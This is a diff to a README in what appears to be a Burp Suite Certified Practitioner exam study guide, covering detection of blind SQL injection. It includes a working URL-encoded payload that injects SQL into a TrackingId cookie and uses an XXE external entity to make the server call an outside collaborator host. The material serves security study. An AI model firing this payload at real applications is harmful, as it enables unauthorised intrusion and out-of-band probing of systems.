botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ### Blind SQLi no indication

->Placing a single quote at end of the ```trackingid``` cookie or search parameter give no internal server error 500.
-Making educated guess, by using below blind SQLi payload abd combine with basic XXE technique, this then makes a call to collaboration server but no data is ex-filtrated.
+>Placing a single quote at end of the ```trackingid``` cookie or search parameter `/search_advanced?searchTerm='` may give response `500 Internal Server Error`.
+Make an educated guess, by using below blind SQLi payload and combine with basic XXE technique, this then makes a call to collaboration server but no data is ex-filtrated.

 ```sql
 TrackingId=xxx'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//COLLABORATOR.NET/">+%25remote%3b]>'),'/l')+FROM+dual--